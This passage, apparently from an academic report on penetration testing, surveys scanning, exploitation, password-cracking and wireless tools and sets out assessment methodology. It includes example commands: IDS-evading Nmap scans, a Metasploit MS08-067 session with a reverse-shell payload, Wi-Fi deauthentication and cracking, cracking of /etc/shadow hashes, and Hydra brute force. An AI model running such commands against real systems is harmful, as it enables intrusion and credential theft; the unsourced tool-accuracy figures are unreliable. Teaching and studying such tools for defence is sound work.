NMAP is primarily a host detection and port discovery tool. Instead of using Nessus to look for specific vulnerabilities against a known quantity of hosts, NMAP discovers active IP hosts using a combination of probes. Once a network scan is done, you can have NMAP look at specific hosts for open ports. NMAP can also attempt to gather additional information about the open ports, such as the version of a database running on one of your servers, but its bread and butter is really host detection and port scanning. One huge benefit of NMAP's open source roots is that it includes a scripting engine that allows users to create complex NMAP scripts. Scripts are broken into several categories, including auth (attempts to brute-force authentication), discovery, intrusive, and malware (which looks for malware-infected machines).
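As a hedged sketch of the scripting engine in use (192.168.0.1 is a placeholder target on a lab network):

#nmap -sV -sC 192.168.0.1                      <= version detection plus the default script set
#nmap --script "default or safe" 192.168.0.1   <= run scripts selected by category expression
#nmap --script banner -p 21,25,80 192.168.0.1  <= a single discovery script against selected ports

Category expressions let you stay within the intrusiveness level agreed in the rules of engagement; the intrusive and exploit categories should only be run when the engagement explicitly allows them.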

Pros and Cons of NMAP
Pros:
1. Fast and reliable
2. OS and application version info
3. Accepts IP address ranges, lists, and file input
4. Front ends are available for those who prefer not to use the command line

Cons:
1. Scanning may be considered hostile
2. SYN scans have been known to crash some systems

A Simple Guide to Nmap Usage

What is Nmap? It is short for Network Mapper, a free port scanner released under the GNU GPL, written by Fyodor with contributions from around the world. It is a simple, fast, and very effective port scanner. It has gone through many changes, with more and more features added; a recent addition is version scanning, which is very useful against networks. It is the port scanner of choice: administrators, hackers, crackers, script kiddies, and many more use it, and even Microsoft has included it in its auditing tools list and recommends using nmap for scans. A great thing about Nmap is that many people have put in the effort to port it to other platforms such as Windows, BSD, and Mac OS, so you can run it on nearly any platform. It supports many types of scans, different flags are used for each, and the results are brief and easy to interpret.

Nmap supports different types of scans, enumerated below:

TCP Connect Scan: This is the simplest form of scanning. It connects to every port on the target machine and lists the open ones. The idea behind this kind of scan is simple: if a port on the target machine is open and accepting connections, the connect() call will succeed, and if the port is not listening it is considered closed. For a Unix user with low privileges this is the default scanning option. It can be very useful, as it is fast and the parallel scanning option can be used with a TCP connect scan. But this type of scan has its demerits: it can be easily detected and filtered, and it leaves many connection log entries. An example of this is:

#nmap -sT 192.168.0.1

TCP SYN Scan: This type of scan is also called half-open scanning, as a full TCP connection is not made to the target port. First a SYN packet is sent to the port, as if a real connection is going to be established. If the port is open and listening, it sends back a SYN|ACK, indicating the port is open; if we get an RST back, the port is not listening and is closed. When we get a SYN|ACK, we immediately send an RST packet back, which tears down the half-open connection. This type of scan has the advantage that only a few systems monitor and log such scan attempts. Its demerit is that you need to be root to craft SYN packets. An example of this is:

#nmap -sS 192.168.0.1

TCP FIN, Xmas, and Null Scans: Sometimes SYN scans are not enough, as they can be detected by packet filters watching for SYN packets sent to unlikely ports. FIN, Xmas, and Null scans are able to bypass this type of filtering. In these techniques, when a FIN packet is sent to an open port, the open port ignores the packet, while a closed port immediately sends back an RST packet; this tells nmap which ports are open and which are closed. These scans have their own merits and demerits: they are not effective against Microsoft platforms, since Windows replies with an RST from every port whenever a FIN packet is sent, but that behavior can itself be used to discover that the system is Microsoft-based. Examples of these are:

#nmap -sF 192.168.0.1    <= FIN scan
#nmap -sX 192.168.0.1    <= Xmas scan
#nmap -sN 192.168.0.1    <= Null scan

Ping Scan: Sometimes you just want to know which systems are up, and this is the most common scan method for determining that. It works by sending ICMP echo packets to all the specified hosts; all hosts that respond are up. But sometimes ICMP echo packets are blocked, so this fails to pick up systems that are alive. Nmap is smarter in this respect: it has an option which sends a TCP ACK packet to the target system (by default to port 80), and if the system responds with an RST packet, that is an indication the system is up. A third technique sends a SYN packet and waits for an RST or SYN|ACK, which likewise indicates the system is up. Examples of these are:

#nmap -sP 192.168.0.1-255    <= Ping scan
#nmap -PT80 192.168.0.1      <= TCP ping scan

UDP Scan: This type of scan is used to determine which UDP ports are open on the target host. A 0-byte UDP packet is sent to each of the specified ports on the target machine; if we get back ICMP port unreachable, the port is assumed closed, otherwise it is considered open. A demerit is that ISPs often block or rate-limit these responses, so the scan sometimes reports ports as open when in fact they are not, so treat these results with caution. An example of this is:

#nmap -sU 192.168.0.1

Version Detection Scan: A recent addition to Nmap is version detection, which determines the service running and the version number of the daemon. It is very useful, as it reveals old and vulnerable daemons, a job normally left to vulnerability scanners; in the hands of a real nmap geek, version detection alone covers much of that ground. In this type of scan a service fingerprint is taken from the daemon and compared to Nmap's database of fingerprints; when it matches, it is certain what service is running.

An example of this is :-

#nmap -sV 192.168.0.1

Protocol Scan: This technique is used to learn which IP protocols are supported on the target host. This is done by sending raw IP packets, without any protocol header, for each protocol number on the target host. Nmap probes for 256 protocol types, which is time-consuming, but it is useful now and then. An example of this is:

#nmap -sO 192.168.0.1

ACK Scan: This type of scan is used to map out firewall rulesets. It can determine whether the firewall is stateful or just a packet filter that blocks incoming SYN packets. In this scan an ACK packet is sent to the port; if the port replies with an RST, it is classified as unfiltered, and if no reply is returned it is classified as filtered. An example of this is:

#nmap -sA 192.168.0.1

List Scan: This is used to generate a list of IP addresses without actually pinging or scanning them; a DNS resolution is also performed in this type of scan. An example of this is:

#nmap -sL yahoo.com

RPC Scan: This type of scan uses a number of port scanning techniques. It takes all the TCP and UDP ports found and floods them with SunRPC NULL commands to determine whether they are RPC services, and it also captures the version number. An example of this is:

#nmap -sR 192.168.0.1

Idle Scan: This is a truly blind scan, which means that no packet is sent from your own IP address. Instead, another host, often called a zombie, is used to scan the target machine and determine its open ports. This is done by predicting the sequence numbers of the zombie host and using that host to scan the target; if the target machine checks the IP of the scanning party, the IP of the zombie machine will show up. It is best to use this technique late at night when the zombie is idle, to get the best results. There is a very good paper on idle scanning available from SecurityFocus, and there is also an exclusive paper on idle scanning with nmap at insecure.org. This type of scan also helps to map out the trust relationships between hosts, which is crucial for spoofing attacks. An example of this is:

#nmap -sI zombie.yahoo.com mail.yahoo.com

Window Scan: This type of scan is very similar to the ACK scan. It is used to map out open/closed and filtered/unfiltered ports thanks to an anomaly in TCP window size reporting by different operating systems. The majority of *nix operating systems are susceptible to it. An example of this is:

#nmap -sW 192.168.0.1

Different Types of Flags Used in Scanning:

-P0 :- This flag disables pinging the host before scanning. This is useful in many cases, as some servers ignore ICMP echo requests; with this flag the host is scanned without first discovering it with ping. A TCP ACK ping can also be combined with it, as in -PT80.

-PT :- This flag is used to determine which hosts are up when ICMP echo reply packets are blocked. A TCP ACK packet is sent to the target network, and hosts that reply with an RST are up; otherwise they are assumed down.

-PS :- This flag uses SYN packets instead of ACK packets. Constructing these packets is limited to root users. All hosts that respond with an RST or SYN|ACK are up; if nothing comes back, the host is assumed to be down.

-O :- This flag is used to identify the target operating system. This is done by comparing Nmap's stored fingerprint database with the fingerprints generated by the host. This technique can also calculate the uptime of the computer and determine TCP sequence predictability.

-f :- This flag is used to evade intrusion detection and packet filtering systems; it can be combined with the SYN, FIN, NULL, and Xmas scan options. Packets are broken into tiny fragments which are hard for IDSs and packet filters to detect.

-v :- This flag enables verbose output, printing information on everything that happens during the scan. It can be used twice (-vv) for even more information.

-p :- This flag is used to specify the custom port numbers you want to scan; multiple ports can be separated using commas. An example of this is:

#nmap -sT -p 21,23,80,139,6000 192.168.0.1

-F :- This flag is used for fast scanning. When it is used, only the ports listed in the nmap services file are scanned, which is what makes the scan very fast.

-M :- This flag is used to specify the maximum number of sockets to be used for parallel scanning.

-T :- This flag is used to specify the timing policy for the scan. Timing can be used to evade intrusion detection systems, or to deliberately set them off. There are six timing templates:

Paranoid   :- Very slow; very handy for evading IDSs.
Sneaky     :- Similar, but waits only 15 seconds between sending packets.
Polite     :- Helps to ease the load on the network.
Normal     :- The default scanning behavior.
Aggressive :- Makes the scan a bit faster.
Insane     :- The quickest scan; it triggers IDSs.

Examples Of Scanning :-

#nmap -sS -v 192.168.0.1
#nmap -sT -v 192.168.0.1
#nmap -sS -sV -v 192.168.0.1
#nmap -sT -sV -v 192.168.0.1
#nmap -sT -sV -v -P0 192.168.0.1
#nmap -sP -v 192.168.0.1-255
#nmap -PT80 -vv 192.168.0.1-255
#nmap -sF -vv 192.168.0.1
#nmap -sO -sV 192.168.0.1
#nmap -sI -P0 zombie.myhost.com yourhost.com
#nmap -sT -sV -p 21,23,79,80 192.168.0.1
#nmap -sT -sV -T Paranoid 192.168.0.1
#nmap -sT -P0 -T Insane -M 10 192.168.0.1
#nmap -sT -T5 -M 1000 192.168.0.1

Metasploit
Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. One free extra is Metasploitable, an intentionally insecure Linux virtual machine you can use for testing Metasploit and other exploitation tools without hitting live servers. Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less). The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage.

Pros and Cons of Metasploit
Pros:
a. Growing community of users
b. Growing documentation
c. Excellent tools to identify and exploit vulnerabilities
Cons:
a. Do not expect all exploits to be up to date with the latest exploits
b. Lack of logging or reports
c. The machine running Metasploit can itself be compromised
d. It can be a dangerous tool and may violate policy at your organization
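A minimal msfconsole session illustrating the typical workflow, offered as a hedged sketch: the module shown (the classic MS08-067 exploit suitable for lab targets) and all addresses are placeholders, and option names vary between modules:

msf > search ms08-067                               # find candidate modules
msf > use exploit/windows/smb/ms08_067_netapi       # select the exploit module
msf > set RHOST 192.168.0.99                        # target host (lab machine)
msf > set PAYLOAD windows/meterpreter/reverse_tcp   # payload to deliver on success
msf > set LHOST 192.168.0.5                         # your listener address
msf > exploit                                       # run the attack

Search, select, configure, run is the same loop regardless of module, which is much of why the Framework became the standard platform.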

Aircrack
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (which decrypts WEP/WPA capture files).
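A hedged sketch of the classic capture-then-crack workflow using the modern aircrack-ng tool names (interface names, channel, BSSID, and wordlist are placeholders for your lab setup):

#airmon-ng start wlan0                                            <= put the wireless interface into monitor mode
#airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon   <= capture traffic for one target network
#aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon             <= force clients to reconnect and reveal the WPA handshake
#aircrack-ng -w wordlist.txt capture-01.cap                       <= offline dictionary attack against the captured handshake

Note that the deauthentication step is active and disruptive, so it belongs under the same rules-of-engagement constraints as any other attack.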

BackTrack
This excellent bootable live CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc.

John the Ripper


John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X. Its primary purpose is to detect weak Unix passwords, though it supports hashes for many other platforms as well. There is an official free version, a community-enhanced version (with many contributed patches but not as much quality assurance), and an inexpensive pro version.
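As a brief hedged example against local Unix password hashes (the file names and wordlist are placeholders; John also accepts many other hash formats):

#unshadow /etc/passwd /etc/shadow > hashes.txt   <= combine account and hash files into John's input format
#john --wordlist=rockyou.txt hashes.txt          <= dictionary attack against the combined file
#john --show hashes.txt                          <= display any passwords cracked so far

Run with no options at all (#john hashes.txt), John falls back to its default cracking modes, which can run for a very long time.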

Burp Suite
Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. All of the tools share the same framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting, and extensibility. There is a limited free version and also Burp Suite Professional ($299 per user per year).

Pros and Cons of Burp Suite Pro
Pros:
a. As a manual test tool it is top rated
Cons:
a. It lacks JavaScript support, which is a very big limitation

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
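A hedged example invocation (the host and output file are placeholders):

#nikto -h http://192.168.0.1 -p 80,443 -o nikto-report.html   <= scan both web ports and write an HTML report

Because Nikto makes thousands of requests with no attempt at stealth, it sits firmly in the active information gathering category and will show up clearly in web server logs.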

Hping
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Unfortunately, it hasn't been updated since 2005. The Nmap Project created and maintains Nping, a similar program with more modern features such as IPv6 support, and a unique echo mode.
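A couple of hedged hping3 examples (the target address is a placeholder) matching the uses described above:

#hping3 -S -p 80 -c 3 192.168.0.1            <= send three TCP SYN probes to port 80 and show the replies
#hping3 --traceroute -S -p 443 192.168.0.1   <= traceroute using TCP SYN to 443, useful where ICMP/UDP traceroute is blocked

Comparing which probes elicit replies on which ports is exactly how firewall rule sets get mapped out.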

W3AF
W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation plugins. In some ways it is like a web-focused Metasploit.

Scapy
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. Note that Scapy is a very low-level tool: you interact with it using the Python programming language. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more.
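A hedged taste of the interactive style: the session below hand-builds the same TCP SYN probe that nmap -sS automates (the address is a placeholder, and root privileges are needed to send raw packets):

#scapy
>>> pkt = IP(dst="192.168.0.1")/TCP(dport=80, flags="S")   # layer an IP header under a TCP SYN
>>> ans = sr1(pkt, timeout=2)                              # send and wait for a single reply
>>> ans.summary() if ans else "no reply (filtered?)"

A SYN|ACK in the reply means the port is open; an RST means closed; silence usually means filtered.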

Ping/Telnet/Dig/Traceroute/Whois/netstat
While there are many advanced high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although more advanced functionality is available from Hping and Netcat.
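A few hedged one-liners showing how far the basics alone can take you during reconnaissance (example.com and the address are placeholders):

#dig example.com MX +short      <= mail servers, which often reveal hosting/filtering providers
#whois example.com              <= registrant, name servers, and contact details
#traceroute -n 192.0.2.14       <= the network path, hinting at upstream providers and firewalls
#netstat -an | grep LISTEN      <= on a compromised or test host, what is listening locally

(On Windows the equivalents are nslookup, tracert, and netstat; whois is not included by default.)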

Hydra
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.
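A hedged example of a dictionary attack against SSH (the target, username, and wordlist are placeholders; the service://host syntax is supported by recent Hydra versions):

#hydra -l admin -P passwords.txt -t 4 ssh://192.168.0.1   <= try each password for user 'admin' over 4 parallel tasks

Keep the task count (-t) modest: many services lock accounts or throttle connections, and a noisy brute force is one of the easiest attacks for a security team to detect.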

Acunetix
Acunetix Web Vulnerability Scanner crawls Web sites, including sites hosting Flash content, analyzes Web applications and SOAP-based Web services, and finds SQL injection, cross-site scripting, and other vulnerabilities. It includes an automatic JavaScript analyzer that enables security analysis of AJAX and Web 2.0 applications, as well as Acunetix's AcuSensor Technology, which can pinpoint the following checks among others: version checks; Web server configuration checks; parameter manipulations; multi-request parameter manipulations; file checks; unrestricted file upload checks; directory checks; text searches; weak HTTP passwords; hacks from the Google Hacking Database; port scanner and network alerts; other Web vulnerability checks; and other application vulnerability tests. The scanner is able to automatically fill in Web forms and authenticate against Web logins, enabling it to scan password-protected areas. Additional manual vulnerability tests (e.g., buffer overflows, subdomain scanning) are supported by the scanner's built-in penetration testing tools. The penetration test tool suite includes an HTTP Editor for constructing HTTP/HTTPS requests and analyzing the Web server's response; an HTTP Sniffer for intercepting, logging, and modifying HTTP/HTTPS traffic and revealing data sent by a Web application; an HTTP Fuzzer for sophisticated fuzz testing of Web applications' input validation and handling of unexpected and invalid random data; a scripting tool for scripting custom Web attacks; and a Blind SQL Injector for automated database data extraction. Acunetix Web Vulnerability Scanner includes a reporting module that can generate compliance reports for PCI DSS and other regulations/standards. The scanner is offered in Small Business, Enterprise, and Consultant editions.

2.3 Merits and Demerits of Penetration Testing Tools

Tool             Vulnerability found  Vulnerability missed  Scan time  Performance  Accuracy  Reliability  Used in Current Industry
Acunetix         54%                  36%                   6.2 min    66%          51%       59%          3%
Appscan          64%                  16%                   7.1 min    68%          67%       62%          9%
Burp Suite Pro   63%                  53%                   4.8 min    70%          62%       65%          2%
Hailstorm        61%                  39%                   3.6 min    67%          70%       72%          8.5%
NMAP             92%                  8%                    1.18 min   81%          88%       93%          37.5%
Nessus           91%                  9%                    1.25 min   76%          82%       82%          19%
Metasploit       87%                  11%                   2.48 min   74.25%       79%       77%          21%
Usage of Pentest Tools in Current Industry

[Figure: bar chart of the "Used in Current Industry" percentages from the table above, for Acunetix, Appscan, Burp Suite Pro, Hailstorm, NMAP, Nessus, and Metasploit.]

CHAPTER 3 Proposed Work

3.1 Penetration Testing in Current Industry, 3.2 Vulnerability Assessment, 3.3 Roles and Responsibilities of Penetration Testers, 3.4 Proposed Work

3.1 Penetration Testing in Current Industry
With the emergence of the Internet, web applications have penetrated deeper and deeper into the enterprise. Initially used as a public interface towards customers, mostly serving marketing purposes, web applications have grown into complex, multilayer solutions that serve diverse purposes in modern organizations and enterprises. From a public marketing interface, web applications have moved into the internal network, serving a multitude of purposes: people management, accounting, support, document management, asset management, etc. Web applications have largely replaced traditional desktop applications in most modern organizations and businesses. Services that have traditionally been delivered by numerous other types of applications are now often delivered by web applications. The ease of development of web applications is the primary reason for their deep integration into modern networks. However, it is also the primary reason why so many web applications are prone to often serious security weaknesses and vulnerabilities. Currently, web applications are the single most attacked service type on the Internet.

Web Application Penetration Testing


The following short summary describes the general methodology used throughout Web Application Penetration Testing engagements:

Reconnaissance: Passive Information Gathering, Active Information Gathering, Information Analysis

Discovery: Web Page Crawling, Cookies Gathering, Site Structure & Hidden Pages

Identification: Vulnerability Assessment Tools, Vulnerability Databases, Manual Identification

Exploitation: Manual Exploitation, Custom Exploit Tools, Public Exploit Tools

Rating: Vulnerability Rating, Tool Output Rating

The general penetration testing methodology is based on a circular approach of 5 continuous phases, as outlined above. During a typical engagement, the tester starts with the Reconnaissance phase and moves forward until the Rating phase. The whole process is repeated several times if needed in order to obtain results that are as accurate as possible. The Web Application Penetration Testing service is based on the OWASP web application testing methodology, complemented by general penetration testing methodologies such as OISSG's ISSAF or SANS. Our vision is that although it is important to follow a general methodology, penetration testers should have the ability to change the methodology they are using and adapt it to each particular test. This vision reflects the way real attackers would proceed: professional attackers will deviate from a methodology or process in order to achieve their goal. Following is a general description of the 5-phase approach that is followed throughout Web Application Penetration Testing engagements:

Reconnaissance - The Reconnaissance phase encompasses the actions taken by the security consultant to gain better knowledge about the target web application, including its design and functions. Different methods are employed to obtain as much information as possible about the target web application, including the use of external sources such as search engines, public forums, newsgroups, etc. The consultant will also attempt to precisely identify the target web server, application server, operating systems, development environments, back-end database, etc.

Discovery - The Discovery phase encompasses the active gathering of information from the target web application. Using a set of tools and utilities, the security consultant will attempt to map the structure of the target web site. The result of this phase is typically a detailed scheme that describes the structure of the web application or site and that provides the consultant with important information about weak points in the application. The consultant will use the information obtained throughout the phase to select target pages that are likely to contain security issues and vulnerabilities (i.e., dynamic pages).

Identification - During the Vulnerability Identification phase, the security consultant will attempt to identify security weaknesses, vulnerabilities, or issues in the list of resources that were identified throughout the previous phases. The identification of security vulnerabilities and weaknesses in the target web application is performed using several methods, including the use of vulnerability assessment tools and utilities, the use of vulnerability databases, and manual vulnerability identification.

Exploitation - The Vulnerability Exploitation phase is the most critical part of a Web Application Penetration Testing engagement. During this phase, the security consultant will attempt to exploit the vulnerabilities that were previously discovered by performing an actual attack against the services in question. Several methods of exploitation are used, including manual exploitation, the use of custom exploitation scripts, and the use of publicly available security exploits.

Rating - The primary objective of the Vulnerability Rating phase is to objectively rate the security vulnerabilities and weaknesses that have been discovered throughout the previous testing phases and to prepare all information that will be needed for the penetration testing report. The tester will also save all log information, such as attack tool output, attack screenshots, and vulnerability assessment scan reports. If optional logging of packet captures was ordered, the captures will be stored for the retention period.

3.2 Vulnerability Assessment

Vulnerability: A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system's security policy.

Vulnerability assessments are a crucial component of network security and the risk management process. Internetworks and Transmission Control Protocol/Internet Protocol (TCP/IP) networks have grown exponentially over the last decade. Along with this growth, computer vulnerabilities and malicious exploitation have increased. Operating system updates, vulnerability patches, virus databases, and security bulletins have become key resources for any savvy network administrator or network security team. It is the application of patches and the use of knowledge gained from these resources that actually makes the difference between a secure network system and a network used as a backdoor playground for malicious hacker attacks. Starting with a system baseline analysis, routine vulnerability assessments need to be performed and tailored to the needs of the company to maintain a network system at a relatively secure level. There are two types of vulnerability assessments: network-based and host-based. The assessment can be carried out either internally or outsourced to a third-party vendor such as Foundstone (www.foundstone.com) or Vigilante (www.vigilante.com). The initial vulnerability assessment should be performed internally, with collaboration between the Information Technology (IT) department and upper management, using the host-based approach. The scope of this paper outlines methods and guidelines to perform a basic host-based vulnerability assessment, with a review of the risk management process, performing a system baseline assessment, and finally, a basic vulnerability assessment.

Once the credible threats are identified, a vulnerability assessment must be performed. The vulnerability assessment considers the potential impact of loss from a successful attack as well as the vulnerability of the facility/location to an attack. Impact of loss is the degree to which the mission of the agency is impaired by a successful attack from the given threat. A key component of the vulnerability assessment is properly defining the ratings for impact of loss and vulnerability. These definitions may vary greatly from facility to facility. For example, the amount of time that mission capability is impaired is an important part of impact of loss. If the facility being assessed is an Air Route Traffic Control Tower, a downtime of a few minutes may be a serious impact of loss, while for a Social Security office a downtime of a few minutes would be minor. A sample set of definitions for impact of loss is provided below. These definitions are for an organization that generates revenue by serving the public.

Devastating: The facility is damaged/contaminated beyond habitable use. Most items/assets are lost, destroyed, or damaged beyond repair/restoration. The number of visitors to other facilities in the organization may be reduced by up to 75% for a limited period of time.

Severe: The facility is partially damaged/contaminated. Examples include partial structure breach resulting in weather/water, smoke, impact, or fire damage to some areas. Some items/assets in the facility are damaged beyond repair, but the facility remains mostly intact. The entire facility may be closed for a period of up to two weeks and a portion of the facility may be closed for an extended period of time (more than one month). Some assets may need to be moved to remote locations to protect them from environmental damage. The number of visitors to the facility and others in the organization may be reduced by up to 50% for a limited period of time.

Noticeable: The facility is temporarily closed or unable to operate, but can continue without an interruption of more than one day. A limited number of assets may be damaged, but the majority of the facility is not affected. The number of visitors to the facility and others in the organization may be reduced by up to 25% for a limited period of time.

Minor: The facility experiences no significant impact on operations (downtime is less than four hours) and there is no loss of major assets.

Vulnerability is defined to be a combination of the attractiveness of a facility as a target and the level of deterrence and/or defense provided by the existing countermeasures. Target attractiveness is a measure of the asset or facility in the eyes of an aggressor and is influenced by the function and/or symbolic importance of the facility. Sample definitions for vulnerability ratings are as follows:

Very High: This is a high profile facility that provides a very attractive target for potential adversaries, and the level of deterrence and/or defense provided by the existing countermeasures is inadequate.

High: This is a high profile regional facility or a moderate profile national facility that provides an attractive target and/or the level of deterrence and/or defense provided by the existing countermeasures is inadequate.

Moderate: This is a moderate profile facility (not well known outside the local area or region) that provides a potential target and/or the level of deterrence and/or defense provided by the existing countermeasures is marginally adequate.

Low: This is not a high profile facility and provides a possible target and/or the level of deterrence and/or defense provided by the existing countermeasures is adequate.

The vulnerability assessment may also include detailed analysis of the potential impact of loss from an explosive, chemical, or biological attack. Professionals with specific training and experience in these areas are required to perform these detailed analyses.

A vulnerability assessment is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system. Examples of systems for which vulnerability assessments are performed include, but are not limited to, information technology systems, energy supply systems, water supply systems, transportation systems, and communication systems. Such assessments may be conducted on behalf of a range of different organizations, from small businesses up to large regional infrastructures. Vulnerability from the perspective of disaster management means assessing the threats from potential hazards to the population and to infrastructure. It may be conducted in the political, social, economic or environmental fields. Vulnerability assessment has many things in common with risk assessment. Assessments are typically performed according to the following steps:

1. Cataloging assets and capabilities (resources) in a system
2. Assigning quantifiable value (or at least rank order) and importance to those resources
3. Identifying the vulnerabilities or potential threats to each resource
4. Mitigating or eliminating the most serious vulnerabilities for the most valuable resources

A vulnerability assessment is the process of running automated tools against defined IP addresses or IP ranges to identify known vulnerabilities in the environment. Vulnerabilities typically include unpatched or misconfigured systems. The tools may be commercial products, such as Nessus or SAINT, or free open source tools such as OpenVAS. The commercial versions typically include a subscription to maintain up-to-date vulnerability signatures, similar to antivirus software subscriptions. The commercially available tools provide a straightforward method of performing vulnerability scanning. Organizations may also choose to use open source versions of vulnerability scanning tools. The advantage of open source tools is that you are using the tools of the trade commonly used by hackers. Most hackers are not going to pay $2,000 for a subscription to Nessus but will opt for free tools. However, by using a commercially licensed vulnerability scanner, the risk is low that malicious code is included in the tool. The purpose of a vulnerability scan is to identify known vulnerabilities so they can be remediated, typically through the application of vendor-supplied patches. Vulnerability scans are key to an organization's vulnerability management program. The scans are typically run at least quarterly. Vulnerabilities are remediated by the IT department until the next scan is run and a new list of vulnerabilities that need to be addressed is identified.

A vulnerability assessment is an automated scan to determine basic flaws in a system. This can be either network or application vulnerability scanning, or a combination of both. The common factor here is that the scan is automated and generates a report of vulnerabilities or issues that may need to be addressed. In a network vulnerability scan, software looks at a set list of IP addresses to determine what services are listening across the network, and also what software (including versions of the software) is running. Limited tests are run against the listening services, including attempts to log in with default account credentials, or comparing the versions of software against known vulnerable versions. If a match is found, it is recommended that the listening port be closed off and/or the software be upgraded if possible. Application vulnerability scanning can take either or both of two approaches:

Static Code Analysis: If you own the codebase of your application, the best place to start is with secure coding practices, and it is a good idea to have code review as part of your software development process. Static code analysis involves more work upfront but results in much more robust applications.

Dynamic Code Analysis: The next step, dynamic analysis, takes a black-box approach to the application, probing it with scanner-like tools that perform injections and try to crash or bypass controls in the application. This is an automated process, and there are some inexpensive or free tools from Cenzic, Whitehat and Veracode, among others, that can do this on a basic level and offer different versions of this type of scan.

Identifying Vulnerabilities
A vulnerability assessment uses a combination of various methodologies to identify vulnerabilities, including:

1. Patch correlation - identifying the flaw by looking to see if the patch for the flaw is missing
2. Version correlation - identifying the flaw by looking at the software version in question
3. Configuration correlation - identifying the flaw based on system configurations
4. Policy correlation - identifying the flaw based on policy, procedure, and specification analysis
5. Inferred correlation - identifying the flaw based on the presence of software, services, other flaws, etc.
6. Response correlation - identifying the flaw based on the results of an exploit attempt
7. Social correlation - identifying the flaw based on social situations
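As a concrete illustration of method 2 (version correlation), the Python sketch below grabs a service banner and compares it against a small table of versions with publicly known flaws. The host, port, banner strings and lookup table are illustrative assumptions, not the workings of any particular scanner:

import socket

# Hypothetical lookup table mapping banner substrings to known issues.
KNOWN_VULNERABLE = {
    "vsFTPd 2.3.4": "backdoored release (CVE-2011-2523)",
    "OpenSSH 4.3": "multiple publicly known vulnerabilities",
}

def banner_check(host, port=21, timeout=5):
    # Grab whatever the service announces when a client connects.
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
    for version, issue in KNOWN_VULNERABLE.items():
        if version in banner:
            return banner, issue
    return banner, None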

Misconception #1 - A vulnerability assessment just finds vulnerabilities; it does not exploit them.

The methodology used for the activity does not determine whether the activity is a vulnerability assessment or a penetration test. However, the methodology used for vulnerability identification may affect the correctness and completeness of identification, which will in turn affect the overall outcome of the assessment. Each of the methods is useful to varying degrees in different scenarios. No one method is clearly better than another method in all cases. Regardless of how we enumerate the vulnerabilities, we now have them. Notice that in some cases, we actually exploited the vulnerabilities to directly or indirectly identify their presence. Performing the exploitation did not move us out of the realm of a vulnerability assessment (misconception #1). We could potentially run every single exploit for every vulnerability as our means of vulnerability identification, if we had exploits for every vulnerability that we wanted to identify. However, realizing that an attempt to exploit a vulnerability may cause disruption to computer networks, may not actually confirm the vulnerability, or, even worse, may cause the assessed system to crash, we often substitute other methods, such as patch validation, for such exploitation. The results are most often more accurate and less disruptive than exploitive vulnerability identification.

Vulnerability Valuation

Vulnerabilities are ranked and classified based on a variety of factors, including:

1. Severity - Confidentiality, Integrity and Availability values for a flaw if it is exploited
2. Exploitability - How easy is it to exploit the flaw
3. Relevance - How new or old is the flaw
4. Organizational risk - How valuable is the resource bearing the vulnerability to the company

These factors allow us to properly assess our target and provide a valuation that makes sense given all of the defined factors (a simple scoring sketch follows below). Finally, it is typically assumed that, as part of the assessment, you will be provided with mitigation strategies to improve the security of the resource. Strictly speaking, this is not part of the assessment process; it is an additional service to an assessment. Some vulnerability assessment vendors will provide very little information, some provide fully managed remediation, and many fall in between.
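The sketch below shows one way the four factors above might be folded into a single score for rank-ordering findings. The 1-5 scales, the multiplicative weighting and the sample findings are assumptions for illustration, not an industry formula such as CVSS:

# Illustrative valuation: each factor is rated 1 (low) to 5 (high).
def risk_score(severity, exploitability, relevance, asset_value):
    return severity * exploitability * relevance * asset_value

findings = [
    ("Unpatched IIS server", 5, 4, 4, 5),
    ("Default SNMP community string", 3, 5, 3, 2),
]
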